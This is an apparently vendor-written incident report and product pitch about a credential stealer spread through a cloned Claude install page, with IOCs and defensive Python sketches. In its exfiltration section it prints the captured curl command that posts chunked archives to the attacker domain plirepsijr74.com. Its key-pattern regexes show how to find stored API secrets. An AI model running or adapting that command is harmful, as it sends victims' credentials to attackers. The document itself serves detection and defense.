LLM Keys Are Being Targeted. Are You Protected?

JetStream Security is reporting a credential stealer attack that exfiltrates LLM API keys using a sophisticated AI-assisted social engineering approach. As of May 7, 2026, only 3 of 93 antivirus (AV) vendors flag the dropped payload as suspicious.

Summary of attack

The attack chain is unremarkable. The delivery surface is new, and it changes how every enterprise holding raw LLM API keys needs to think about governance.

What happened, in simple steps:

- An employee wants to update Claude CLI tools, asks Google AI for instructions, and receives a link to a cloned Claude site.

- The employee runs the suggested command without checking its contents or provenance.

- The command downloads and installs credential-stealing malware.

- The employee’s LLM API keys are exfiltrated within minutes of installing the credential stealer.

- Upon detection, the company rotates keys for all employees.
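The second step in the chain above is where a lightweight check could have helped. The following is a minimal sketch, not a complete defense: it pulls every URL out of a pasted shell command and flags those whose host is not on an allowlist. The allowlist contents, the regular expression, and the function name `untrusted_urls` are assumptions made for illustration; a real allowlist should come from the vendor's own documentation.

```python
import re
from urllib.parse import urlsplit

# Hypothetical allowlist for illustration only; build yours from vendor docs.
TRUSTED_HOSTS = {"claude.ai", "anthropic.com"}

# Rough URL matcher: stops at whitespace, quotes, pipes, semicolons, parens.
URL_PATTERN = re.compile(r"https?://[^\s'\"|;)]+")


def untrusted_urls(command: str, trusted=TRUSTED_HOSTS) -> list[str]:
    """Return every URL in a shell command whose host is not allowlisted."""
    flagged = []
    for url in URL_PATTERN.findall(command):
        host = (urlsplit(url).hostname or "").lower()
        # Accept an exact match or a true subdomain of a trusted host.
        ok = any(host == t or host.endswith("." + t) for t in trusted)
        if not ok:
            flagged.append(url)
    return flagged


if __name__ == "__main__":
    pasted = "curl -fsSL https://claude-ai.example.net/install.sh | bash"
    for url in untrusted_urls(pasted):
        print("Do not run; unrecognized download host:", url)
```

Matching on the parsed hostname rather than on a substring matters here: a lookalike such as `claude.ai.evil.example` contains the trusted name but does not end with it, so it is still flagged.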

Every step in that chain belongs to a category enterprise security teams already understand: employee behavior, malware behavior, response playbook. What is different is that the trusted source was an AI assistant, and the credentials at stake were the keys that wire the rest of the enterprise into the AI economy. The board-level question is no longer whether your AI strategy is funded. It is whether the credentials behind that strategy can be revoked in seconds when something like this happens to you.

Details

Earlier this week, one of our customers was impacted by this credential stealer attack.

Step 1: Poisoned Prompts

While we do not yet have the exact prompt and response that triggered the initial infection, we have observed from multiple sources that there is an active campaign targeting AI and other credentials.

Step 2: Credential Stealer Installed

Once the fake installer runs, it installs a credential stealer. In this incident, the stealer searched for credentials across:

- Cookies

- Login Data

- Keychain

- Wallet

- Documents

- Downloads

- Screenshots

Step 3: Data Exfiltration



The activity strongly indicates data exfiltration using chunked uploads over HTTPS.

```
curl -s -w \n%{http_code} --max-time 120 --retry 3 --retry-delay 5 \
  --retry-all-errors -X POST https://plirepsijr74.com/gate/chunk \
  -F file=@/tmp/shub_mzip_0003.zip \
  -F chunk_session=d8e62a2914e6436cb826963ba3e097fa \
  -F chunk_num=3 \
  -F total_chunks=4 \
  -F key=76e4fdd944f2212bd4897eb73103ed0d628001d6af06acc5972390752d87a07f \
  -F password=1971 \
  -F buildtxd=657406ea09fa4183fccb9fbdcba01aed5d776007750c92cc155ff491ae545322 \
  -F has_valid_password=REDACTED \
  -F build_hash=a39427f9d5bfda11277f1a58c89b7c2d
```



As of May 7, 2026, only 3 of 93 AV vendors are flagging the dropped payload as suspicious.

[Figure: AV detection summary, 3 of 93 vendors flagging the payload as of May 7, 2026.]

Impact

The employee had stored API keys for OpenAI, Anthropic, and Amazon Bedrock on the desktop, including credentials shared across the team. An attacker can monetize such credentials immediately, for example by reselling access or by running their own workloads on the victim's account.
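Keys sitting in plain files are exactly what a stealer sweeping Documents, Downloads, and the desktop will find. As a rough sketch of how a team might look for such files first, the code below scans a directory tree for strings that resemble provider keys. The regular expressions are approximations chosen for illustration (an `sk-ant-` prefix for Anthropic, a generic `sk-` prefix for OpenAI, and AWS access key IDs, which Bedrock access commonly relies on); real key formats vary and change, so expect both false positives and misses. The function names are hypothetical.

```python
import re
from pathlib import Path

# Approximate, illustrative patterns; not authoritative key formats.
KEY_PATTERNS = {
    "anthropic": re.compile(r"sk-ant-[A-Za-z0-9_\-]{20,}"),
    "openai": re.compile(r"sk-(?!ant-)[A-Za-z0-9_\-]{20,}"),
    "aws_access_key_id": re.compile(r"\b(?:AKIA|ASIA)[0-9A-Z]{16}\b"),
}


def find_key_like_strings(text: str) -> list[str]:
    """Return the names of the patterns that match anywhere in the text."""
    return [name for name, pat in KEY_PATTERNS.items() if pat.search(text)]


def scan_directory(root: Path, max_bytes: int = 1_000_000) -> dict[Path, list[str]]:
    """Map each small readable file under root to the patterns it contains."""
    hits = {}
    for path in root.rglob("*"):
        try:
            if not path.is_file() or path.stat().st_size > max_bytes:
                continue
            text = path.read_text(errors="ignore")
        except OSError:
            continue  # unreadable file; skip rather than abort the scan
        found = find_key_like_strings(text)
        if found:
            hits[path] = found
    return hits


if __name__ == "__main__":
    for path, kinds in scan_directory(Path.home() / "Desktop").items():
        print(path, kinds)
```

The scan reports only which pattern matched, never the matched string, so its own output does not become another place where keys leak.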

Recommendations

The company ran a fire drill and rotated all LLM API keys used by developers and agents across the organization. This caused a significant loss of productivity and impacted production workloads.

- We recommend running CrowdStrike in block mode rather than alert mode.

- We highly recommend that customers maintain a centralized repository of all LLM keys, track where and how they are being used, and monitor usage continuously.

- JetStream customers should distribute virtual keys to end users and agents instead of exposing direct LLM provider API keys or MCP server credentials. This centralizes access control, simplifies auditing, and enables rapid credential rotation without impacting productivity. Storing upstream MCP credentials, such as GitHub PATs, directly in agent configurations can increase the risk of sensitive data leakage and unauthorized data exfiltration if those credentials are compromised.
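The centralized repository recommended above can start very small. The sketch below is one possible shape for it, not a description of any product: each record tracks where a key is stored and who consumes it, so that a single compromised host can be translated into a list of keys to rotate and workloads that will be affected. All class, field, and method names are hypothetical, and the inventory deliberately stores labels rather than the secrets themselves.

```python
from dataclasses import dataclass, field


@dataclass
class KeyRecord:
    key_id: str      # internal label, never the secret itself
    provider: str    # e.g. "openai", "anthropic", "bedrock"
    owner: str
    hosts: set = field(default_factory=set)      # machines where the key is stored
    consumers: set = field(default_factory=set)  # apps or agents that use it


class KeyInventory:
    def __init__(self):
        self._records = {}

    def register(self, record: KeyRecord) -> None:
        self._records[record.key_id] = record

    def exposed_by_host(self, host: str) -> list:
        """Keys that must be rotated if this host is compromised."""
        return sorted(r.key_id for r in self._records.values() if host in r.hosts)

    def affected_consumers(self, host: str) -> list:
        """Every consumer that is disrupted when those keys are rotated."""
        affected = set()
        for r in self._records.values():
            if host in r.hosts:
                affected |= r.consumers
        return sorted(affected)


if __name__ == "__main__":
    inv = KeyInventory()
    inv.register(KeyRecord("anthropic-team", "anthropic", "platform",
                           hosts={"laptop-17", "ci-runner"},
                           consumers={"support-agent", "code-review-bot"}))
    inv.register(KeyRecord("openai-batch", "openai", "data",
                           hosts={"batch-01"}, consumers={"nightly-summaries"}))
    print(inv.exposed_by_host("laptop-17"))     # keys to rotate
    print(inv.affected_consumers("laptop-17"))  # workloads to warn
```

With this in place, the question "what do we rotate?" has a bounded answer for a given host, rather than defaulting to every key in the organization.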

Indicators of compromise (IOCs)

Network

- Domain `plirepsijr74.com`

- URI path `/gate/chunk`
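As a minimal sketch of how the network indicators above might be applied to URLs pulled from proxy or DNS logs, the function below reports which indicator, if any, a URL matches. The function name and the returned labels are assumptions for illustration; the log format and how URLs are extracted from it are left out.

```python
from urllib.parse import urlsplit

IOC_DOMAIN = "plirepsijr74.com"
IOC_PATH = "/gate/chunk"


def match_network_ioc(url: str) -> list[str]:
    """Return which network indicators ('domain', 'uri_path') a URL matches."""
    reasons = []
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    # Match the domain itself and any subdomain of it.
    if host == IOC_DOMAIN or host.endswith("." + IOC_DOMAIN):
        reasons.append("domain")
    # Ignore a trailing slash when comparing the path.
    if parts.path.rstrip("/") == IOC_PATH:
        reasons.append("uri_path")
    return reasons


if __name__ == "__main__":
    for url in ("https://plirepsijr74.com/gate/chunk", "https://example.org/"):
        print(url, match_network_ioc(url))
```

Reporting the path match separately is a deliberate choice: if the operators move to a new domain but keep the same gate path, the path alone is still worth a look, though it is a weaker signal on its own.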

Host artifacts

- Staging directory pattern `/tmp/shub_*`

- Chunked archives `/tmp/shub_mzip_*.zip`
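The host artifacts above translate directly into filename patterns. The following sketch checks a directory for entries matching them; it assumes the staging names follow the `shub_` prefix exactly as observed in this incident, which a later build of the stealer may not. The function names are hypothetical.

```python
from fnmatch import fnmatchcase
from pathlib import Path
from typing import Optional

STAGING_NAME = "shub_*"
ARCHIVE_NAME = "shub_mzip_*.zip"


def classify_name(name: str) -> Optional[str]:
    """Label a file or directory name against the observed host artifacts."""
    if fnmatchcase(name, ARCHIVE_NAME):
        return "chunked_archive"
    if fnmatchcase(name, STAGING_NAME):
        return "staging"
    return None


def scan_dir(directory: str = "/tmp") -> dict:
    """Return {path: label} for every matching entry directly in directory."""
    hits = {}
    for entry in Path(directory).glob(STAGING_NAME):
        hits[str(entry)] = classify_name(entry.name)
    return hits


if __name__ == "__main__":
    for path, label in scan_dir().items():
        print(label, path)
```

An empty result is not proof of a clean host, since the stealer may remove its staging files after upload.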

Behavioral

- Outbound `curl -F` multipart POSTs containing `chunk_session`, `chunk_num`, and `total_chunks` form fields
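The behavioral indicator above can be tested against process command lines collected by endpoint telemetry. The sketch below is one way to do that, under two stated assumptions: the command line is available as a single string, and the form fields are passed as separate `-F name=value` arguments, as in the captured command. Compact forms such as `-Fname=value` are not handled. Function names are hypothetical.

```python
import shlex

REQUIRED_FIELDS = {"chunk_session", "chunk_num", "total_chunks"}


def _tokens(command_line: str) -> list:
    # Join backslash-newline continuations before shell-style splitting.
    return shlex.split(command_line.replace("\\\n", " "))


def form_fields(command_line: str) -> dict:
    """Extract -F/--form name=value pairs from a curl command line."""
    tokens = _tokens(command_line)
    fields = {}
    for i, tok in enumerate(tokens):
        if tok in ("-F", "--form") and i + 1 < len(tokens):
            name, _, value = tokens[i + 1].partition("=")
            fields[name] = value
    return fields


def is_chunked_exfil(command_line: str) -> bool:
    """True if this is a curl call carrying all three chunking form fields."""
    tokens = _tokens(command_line)
    if not tokens or not tokens[0].endswith("curl"):
        return False
    return REQUIRED_FIELDS.issubset(form_fields(command_line))


if __name__ == "__main__":
    observed = ("curl -s -X POST https://plirepsijr74.com/gate/chunk "
                "-F file=@/tmp/shub_mzip_0003.zip -F chunk_session=d8e6 "
                "-F chunk_num=3 -F total_chunks=4")
    print(is_chunked_exfil(observed))
```

Requiring all three field names together keeps ordinary `curl -F` uploads from triggering the rule, at the cost of missing a variant that renames any one of them.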

Why this matters

The credential-stealer playbook hasn’t changed much. The delivery surface has. When the trusted source is now an AI assistant, the question shifts from “is this email safe?” to “is this answer safe to run?”

The real cost of this incident was not the stolen credentials. It was the rotation itself. Raw provider keys, especially shared ones, turn a single host compromise into an organization-wide fire drill on the way back to safe operations. In agentic stacks, the key is no longer just a credential. It is an entry point to whatever the agent was wired up to call. That is why we built JetStream Key Broker™. Virtual keys, scoped and revocable in seconds, mean the next rotation touches one issuance record instead of every team that depends on the provider credential. The next fire drill becomes a control-plane action.
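To make the virtual-key idea concrete, here is a generic, in-memory sketch of the pattern. It is not the implementation of JetStream Key Broker or of any other product; the class names, the `vk-` token prefix, and the one-hour default lifetime are all assumptions for illustration. The point it shows is that holders only ever receive a virtual token, so revoking one holder does not require rotating the upstream provider key.

```python
import secrets
import time
from dataclasses import dataclass


@dataclass
class VirtualKey:
    token: str
    holder: str
    upstream_id: str   # label of the provider key, not the secret
    expires_at: float
    revoked: bool = False


class KeyBroker:
    def __init__(self, upstream_secrets: dict):
        self._upstream = upstream_secrets  # label -> real provider key
        self._issued = {}                  # virtual token -> VirtualKey

    def issue(self, holder: str, upstream_id: str, ttl_seconds: float = 3600.0) -> str:
        """Hand out a short-lived virtual token bound to one upstream key."""
        if upstream_id not in self._upstream:
            raise KeyError(upstream_id)
        token = "vk-" + secrets.token_urlsafe(24)  # hypothetical token format
        self._issued[token] = VirtualKey(
            token, holder, upstream_id, time.time() + ttl_seconds)
        return token

    def revoke(self, token: str) -> None:
        """Invalidate one issuance record; other holders are untouched."""
        self._issued[token].revoked = True

    def resolve(self, token: str, now: float = None):
        """Return the upstream secret for a valid virtual key, else None."""
        vk = self._issued.get(token)
        now = time.time() if now is None else now
        if vk is None or vk.revoked or now >= vk.expires_at:
            return None
        return self._upstream[vk.upstream_id]


if __name__ == "__main__":
    broker = KeyBroker({"anthropic-prod": "placeholder-upstream-secret"})
    laptop = broker.issue("laptop-17", "anthropic-prod")
    agent = broker.issue("build-agent", "anthropic-prod")
    broker.revoke(laptop)  # the compromised holder loses access
    print(broker.resolve(laptop) is None, broker.resolve(agent) is not None)
```

In a real deployment `resolve` would sit inside a proxy that forwards requests to the provider, so the upstream secret never leaves the broker; the sketch returns it directly only to keep the example short.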